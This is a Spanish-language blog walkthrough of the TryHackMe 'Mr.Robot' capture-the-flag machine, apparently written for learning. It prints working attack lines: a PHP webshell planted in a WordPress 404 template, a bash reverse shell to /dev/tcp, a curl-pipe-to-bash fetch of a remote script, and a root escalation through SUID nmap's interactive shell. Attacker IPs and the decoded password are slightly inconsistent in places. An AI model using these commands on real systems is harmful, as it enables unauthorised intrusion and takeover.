Avatar Blog Personal de K0Hack sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

Maquina Mr.RobotCTF de TryHackMe (No necesario VIP)

Anonymous ~ TryHackMe

Realizamos el Primer escaneo con Nmap

$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.158.107       "

Procedemos con el siguiente escaneo de Nmap

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.41 seconds

Procedemos con la herramienta Whatweb:

"# wtw 10.10.158.107     "                                                                                                                             1 ⨯
http://10.10.158.107 [200 OK] Apache, Country[RESERVED][ZZ], HTML5, HTTPServer[Apache], IP[10.10.158.107], Script, UncommonHeaders[x-mod-pagespeed], X-Frame-Options[SAMEORIGIN]
                                                                                                                                                           
"# wtw 10.10.158.107:443  "
http://10.10.158.107:443 [400 Bad Request] Apache, Country[RESERVED][ZZ], HTTPServer[Apache], IP[10.10.158.107], Title[400 Bad Request], X-Frame-Options[SAMEORIGIN]

Procedemos a hechar un vistazo visual a la pagina web por el puerto 80:

INVESTIGANDO POR LA PAGINA WEB ENCONTRAMOS:

1.- http://10.10.158.107/wp-login.php

2.- http://10.10.158.107/comments/ – SEGUIMOS POR AQUI

3.-Probamos a hacer un Simple Fuzzing web ya que el script de nmap esta tardando muchisimo

4.- Buscamos por la ruta de robots.txt:

Encontramos un diccionario `fsociety.txt`que nos descargamos y la primera flag

5.- Seguimos enumerando diferentes archivos a nivel de ruta license.txt:

encontramos esta cadena "ZWxsaW90OkVSMjgtMDY1Mgo="

# echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
	elliot : ER28-0552  		--  que nos permite entrar en el CMS WORDPRESS 

Acceso Inicial desde el Wordpress modificando la plantilla 404.php

Una vez tenemos acceso al Wordpress vamos a repetir el mismo proceso realizado en otras maquinas en la plataforma de HTB mediante en el cual modificando la plantilla de la pagina 404.php por en este caso lo siguiente:

Una webshell facilita para poder ejecutar comandos desde la url
<?php
        system($_RESQUEST['cmd']);
?>

Luego nos montamos un servidor que nos postee un script.sh que nos envie una R_shell a nuestra IP por el 443:

#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.9.4.60/443'

Para luego apuntar desde el 404.php y pipearlo "[ | ]" con Bash:

" http://10.10.158.107/asdfasdfa?cmd=curl%20http://10.9.4.182/script.sh|bash       "			

Accedemos y nos hacemos la consola interactiva con python esta vez:

python -c 'import pty; pty.spawn("/bin/bash")	
ctrl+Z

Vemos que tenemos un la flag en /home/robot/user.txt y que no podemos leerla. Pero podemos ver la pass del user Robot almacenada en la misma carpeta. robot:c3fcd3d76192e4007dfb49xxxxxxxx en md5 La crackeamos con CrackStation.com Procedemos a hacer un cambio de usuario con el comando su y conseguimos la flag user.txt

Escalada de Privilegios hasta el user Root

Procedemos como siempre a enumerar de distintas formas la maquina: 1.- Permisos SUID

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/nmap --SUID

Con el binario de nmap como SUID procedemos asi:

  nmap --interactive
  nmap> !sh  
"robot@linux:~$ /usr/local/bin/nmap --interactive       "
                                                                                                                                                           
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )                                                                                                    
Welcome to Interactive Mode -- press h <enter> for help 

"nmap> !sh  "                                                                                                                                                 
# whoami                                                                                                                                                   
root                                                                                                                                                       
#       

Ya estariamos como root y podriamos sacar la flag root.txt. Maquina Mr.Robots Rooteada =)